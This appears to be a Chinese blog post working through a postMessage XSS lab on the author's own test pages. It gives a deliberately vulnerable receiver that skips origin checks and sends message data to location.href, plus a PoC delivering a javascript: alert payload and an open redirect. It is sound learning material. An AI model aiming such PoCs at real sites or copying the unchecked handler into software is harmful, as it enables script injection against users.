postmessage xss初步学习

最新推荐文章于 2025-12-16 22:22:21 发布
原创 最新推荐文章于 2025-12-16 22:22:21 发布 · 726 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #学习 #前端

随笔

由于本人现在处于项目上,夜班太无聊,随便翻翻网上博客,发现了玲珑的老师-红尘哥在之前写的postmessage xss文章,就想着学习一下这块知识
原文链接

postMessage 的工作原理

postMessage 允许一个窗口向另一个窗口发送消息。消息可以是任意可序列化的数据,例如字符串、数字、对象等。消息的发送方和接收方可以通过 event 对象来处理消息。所以也可以用于xss攻击

环境搭建

由于在上夜班,我自己的vps访问不了,我这里就用dnslog(https://requestrepo.com/)来演示,这个平台可以上传一些html等等文件
在这里插入图片描述

我这里就用红尘哥的环境代码来操作(这里我改了点东西)
demo1.html,代发送数据的页面

<!DOCTYPE html>
<html>
<head>
    <title></title>
 <meta charset="utf-8" />
<script>
function openChild() {
    child = window.open('demo2.html', 'popup', 'height=300px, width=500px');
}
function sendMessage(){
    //发送的数据内容
    let msg={pName : "shihui", pAge: "20"};
    //child.postMessage(msg, '*'); 的意思是:向 child 窗口发送一个消息 msg,并且允许消息发送到任意来源的窗口,也就是说可以发送消息数据到任意目标源
    child.postMessage(msg,'*');
}
</script>
</head>
<body>
    <form>
        <fieldset>
            <input type='button' id='btnopen' value='Open child' onclick='openChild();' />
            <input type='button' id='btnSendMsg' value='Send Message' onclick='sendMessage();' />
        </fieldset>
    </form>
</body>
</html>

demo2.html,代监听发送的数据,接收消息数据页面

<!DOCTYPE html>
<html>
<head>
    <title></title>
    <meta charset="utf-8" />
    <script>
        //添加事件监控消息
    window.addEventListener("message", (event)=>{
        let txt=document.getElementById("msg");
        //接收传输过来的变量数据
        txt.value=`Name is ${event.data.pName} Age is  ${event.data.pAge}` ;

    });
    </script>
</head>
<body>
    <form>
        <h1>postMessage学习</h1>
        <input type='text' id='msg'/>
    </form>
</body>
</html>

这里的接收页面,有三个问题
1.代码没有检查 event.origin,这意味着任何来源的窗口都可以向当前窗口发送消息。如果攻击者通过恶意网站打开你的窗口并发送伪造的消息,这些消息可能会被接收并显示在文本框中。

2.代码没有检查 event.source,这意味着任何窗口都可以发送消息。如果攻击者通过伪造的窗口引用向你的窗口发送消息,这些消息可能会被接收并显示在文本框中。

3.代码直接将接收到的消息内容插入到文本框中,而没有进行任何清理或验证。如果消息内容包含恶意脚本,这些脚本可能会被浏览器执行,导致 XSS 攻击。

在这里插入图片描述

复现

1.打开网站,点击open 会发现打开了demo2那个页面,然后发送
在这里插入图片描述
2.注意,这里已经把内容传输过去了,然后在demo2上查看
在这里插入图片描述
但这里有一个问题就是,这个demo2.html 是任意地址都可以给他发消息
3.那么好,我们来验证一下,是不是可以随便什么地址都可以发(也可以本地直接认证)
再开一个dnslog,新建html
在这里插入图片描述

<!DOCTYPE html>
<html>
<head>
    <title></title>
 <meta charset="utf-8" />
<script>
childwin = window.open('http://6gpquz4n.requestrepo.com/demo2.html');

function sendMessage(){
    let msg={pName : "hack", pAge: "16"};
    childwin.postMessage(msg,'*')
}

(function(){setTimeout("sendMessage()",1000);}()); 
</script>
</head>
</html>

当访问了这个http://u5qr1efs.requestrepo.com/123.html的时候会自动跳转到我们的demo2站
且内容已经修改
在这里插入图片描述
4.以上都是正常模拟
现在开始尝试xss
代码:

<!DOCTYPE html>
<html>
<head>
    <title></title>
    <meta charset="utf-8" />
    <script>
    window.addEventListener("message", (event)=>{
        location.href=`${event.data.url}`;//这里${event.data.url}是可控的 所以尝试xss 也可以尝试url
    });
    </script>
</head>
</html>

在这里插入图片描述
利用poc

<!DOCTYPE html>
<html>
<head>
    <title></title>
 <meta charset="utf-8" />
<script>
childwin = window.open('https://6gpquz4n.requestrepo.com/xss.html');

function sendMessage(){
    let msg={url:"javascript:alert(document.domain)"};
    childwin.postMessage(msg,'*')
}

(function(){setTimeout("sendMessage()",1000);}()); 
</script>
</head>
</html>

在这里插入图片描述
然后访问http://u5qr1efs.requestrepo.com/poc.html
发现自动跳转到https://6gpquz4n.requestrepo.com/xss.html(漏洞存在点)
在这里插入图片描述
这里poc中我们发送了

let msg = { url: "javascript:alert(document.domain)" };
childwin.postMessage(msg, '*');//msg 是一个对象,包含一个 url 属性,其值为 "javascript:alert(document.domain)"

但在xss.html中接收 就是
event.data 是poc代码发送的 msg 对象。因此,event.data.url 的值是 “javascript:alert(document.domain)”
所以他会弹窗

那么该xss的学习就初步到这里
然后我们开始尝试url跳转
在poc.html中修改url:"xxx"这里的xxx可以修改为容易url,我这里就用百度的ico来演示,然后访问http://u5qr1efs.requestrepo.com/poc.html就会发现跳转到百度的ico图标地址
在这里插入图片描述
在这里插入图片描述

石灰11
关注
XSS详解(概念+靶场演示)反射型与存储型的比较与详细操作
Hala
05-04 1万+
目录 XSS(跨站脚本攻击) 1.XSS简介 1.1什么是XSS? 1.2 XSS攻击的危害包括: 2. 分类 2.1反射型 2.2存储型 3. 构造XSS脚本 3.1常用HTML标签 3.2常用javascript方法 4.反射型(四种安全级别演示) 4.4.1低安全级别 4.4.2 中安全级别 4.4.2 高安全级别 4.4.2 不可能安全级别 5.存储型(四种...
xss高级利用
Coisini的博客
05-22 1782
本文将撇开XSS语句,JS脚本,如何无错插入XSS语句,如何过滤和绕过XSS语句过滤,CSRF等知识点.也就是说,你必须已经具备一定XSS知识,才能看懂本文. 如果你还未具备基础XSS知识,以下几个文章建议拜读: http://www.lib.tsinghua.edu.cn/chinese/INTERNET/JavaScript/ JavaScript中文简介 http://www....
【wx.miniProgram.postMessage性能优化】:告别卡顿,体验流畅的响应速度
![【wx.miniProgram.postMessage性能优化】:告别...微信小程序中的`wx.miniProgram.postMessage`是小程序间通信的API。开发者可以通过这个接口实现不同小程序之间的数据交换和功能调用。这对于开发者来说,是一个强
新浪微博2011年6月受到过xss蠕虫攻击简析
如果我年少有为不自卑
10-23 2530
function createXHR(){ return window.XMLHttpRequest? new XMLHttpRequest(): new ActiveXObject("Microsoft.XMLHTTP"); } function getappkey(url){ xmlHttp = createXHR(); xm...
dvwa靶场xss存储型
03-21
### 关于DVWA存储型XSS漏洞的信息 ...$userInput = $_POST['message']; $safeOutput = htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8'); echo $safeOutput; // 输出经过安全化后的消息内容 ``` ---
XSS挑战赛实战演练
m0_63085970的博客
12-14 624
掌握基础xss漏洞绕过的实战
跨站脚本攻击(XSS)解析
cccxcmm的博客
12-11 669
XSS(跨站脚本攻击)是一种常见的Web安全漏洞,允许攻击者在受害者的浏览器中注入恶意脚本。主要分为三类:反射型(通过恶意URL触发)、存储型(恶意代码存储在服务器上)和DOM型(客户端脚本处理不当导致)。XSS的根源在于输入验证不足、输出编码不充分以及安全头配置不当。其危害包括窃取Cookie、会话劫持、钓鱼攻击等。防御措施包括输入验证、输出编码、使用CSP安全头等。尽管现代框架提供了防护,XSS仍因Web应用复杂性而持续存在,是OWASP Top 10中的重要威胁。
Pikachu | XSS
qq_44846097的博客
12-16 503
Pikachu不同xss注入类型渗透测试笔记
DVWA -XSS(DOM)-通关教程-完结
刘箫-技术库
12-16 504
本文介绍了DVWA靶场中DOM型XSS攻击的三种难度级别实战方法。在Low级别中,直接使用<script>标签注入恶意脚本即可获取用户Cookie;Medium级别通过闭合select标签并利用SVG事件绕过过滤;High级别则利用URI片段技术避免服务器检测,成功窃取Cookie。文章详细展示了从简单到复杂的XSS攻击手法,包括启动HTTP服务器接收Cookie的完整过程,揭示了DOM型XSS攻击的原理和防御难点。
运放学习笔记
Z97371539的博客
12-13 550
单电源运放是指仅使用单一电源电压(例如,+5V)和地(0V)作为电源供给的运放。也就是说,它只需要一个正电压和地作为参考电压,而不需要负电压。
日语学习-日语知识点小记-构建基础-JLPT-N3阶段-二阶段(29):第八科文法
最新发布
qq_22146161的博客
12-16 492
自己在今年,在日本留学中,目前在语言学校,我自己不是那种一学什么的都能会的人,只能依靠自己一点一点积累,学习也分为很多种,自己跟着课本学是一种方法,如果记录下来,整理好,教给别人也是一种方式,我希望,以后每天一篇小的日语知识点小记,来构建基础,同时也可以帮助他人。如果您喜欢这个系列,请关注一下,您的关注,就是我持续创作的动力。
Android学Dart学习笔记第十四节 库和导库
weixin_44656996的博客
12-15 686
其他语言中的访问修饰符关键字提供了更细粒度的控制,而Dart使用下划线和基于库的隐私提供了直接的配置机制,有助于高效实现动态访问,并改进了树抖动(死代码消除)。库不仅提供api,还是隐私的单位:以下划线(_)开头的标识符只在库内部可见。当你导入的多个库中,使用了相同的类名时,可以为库起个别名,使用 别名.类名 明确指定所引用的类。使用import来指定如何在另一个库的作用域中使用来自一个库的命名空间。带有通配符_的导入前缀是不绑定的,但可以访问该库中的非私有扩展。
Kamailio的学习
2301_79965178的博客
12-12 596
摘要:本文详细介绍了Kamailio SIP服务器的架构与配置。Kamailio是一款支持高并发、多协议的高性能SIP服务器,采用模块化设计,包含150多个功能模块。文章从配置文件结构(全局参数、模块设置、路由区块)入手,深入解析其多进程模型、Epoll多路复用机制、共享内存和锁定系统等底层实现。重点阐述了Kamailio处理SIP消息的完整流程,包括请求/响应处理、进程间通信等核心机制,并展示了通过kamcmd命令查看进程状态的实践示例。
(HaloOS 基于TC397学习笔记)二、配置工具VCOS Studio使用探索
April的博客
12-11 822
本文介绍了如何使用HaloOS的VCOS Studio工具配置和编译TC397开发板的rt_demo工程。
后端springboot框架入门学习--第一篇
m0_65853019的博客
12-15 522
的。
Kubernetes 学习总结(47)—— Kubernetes 持久化存储之 Volume、PV、PVC、StorageClass 到底怎么用?
科技D人生
12-11 654
Kubernetes持久化存储解决方案摘要 Kubernetes中Pod的临时性特点导致本地存储不可靠,必须使用持久化存储方案。核心组件包括: Volume:基础挂载点,生命周期随Pod PV(PersistentVolume):集群级存储资源池 PVC(PersistentVolumeClaim):用户存储需求声明 StorageClass:动态创建PV的自动化机制 工作流程:Pod通过PVC申请存储,PVC自动匹配或动态创建PV。StorageClass是实现自动化供应的关键,支持多种存储后端(云盘/N
开发跨行业技能迁移匹配工具,输入现有技能+目标行业,AI分析可迁移能力,推荐适配岗位+补全学习路径,助力职场转型。
2301_82202864的博客
12-16 465
/ 每项可迁移技能+5分。`).join('') : '<div class="result-item">无缺失核心技能,可直接尝试转型!coreSkills: ['项目规划', '风险管控', '资源协调', '敏捷开发', ' stakeholder管理'],coreSkills: ['用户画像', '交互设计', '可用性测试', 'Figma/Sketch', '设计思维'],coreSkills: ['SQL', 'Excel高级函数', '数据可视化', '统计分析', '业务理解'],
学习笔记——写时复制(Copy-on-Write)
2301_78295956的博客
12-16 560
摘要:写时复制(COW)是一种延迟资源复制的优化技术,多个调用者初始共享同一资源,仅当修改时才创建副本。该技术通过引用计数和内存页保护实现透明操作,显著提升fork()等系统调用性能,减少内存占用。广泛应用于操作系统、编程语言和存储系统,虽存在首次写入延迟等缺点,但通过批量复制等优化策略可缓解。COW体现了"延迟优化"的设计思维,在资源节约和性能间取得平衡。
学习笔记】利用blender生成的mesh模型(ply格式)并不是水密的
ZhiyangStudy的博客
12-15 167
常用的格式有.ply、.obj、.stl。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值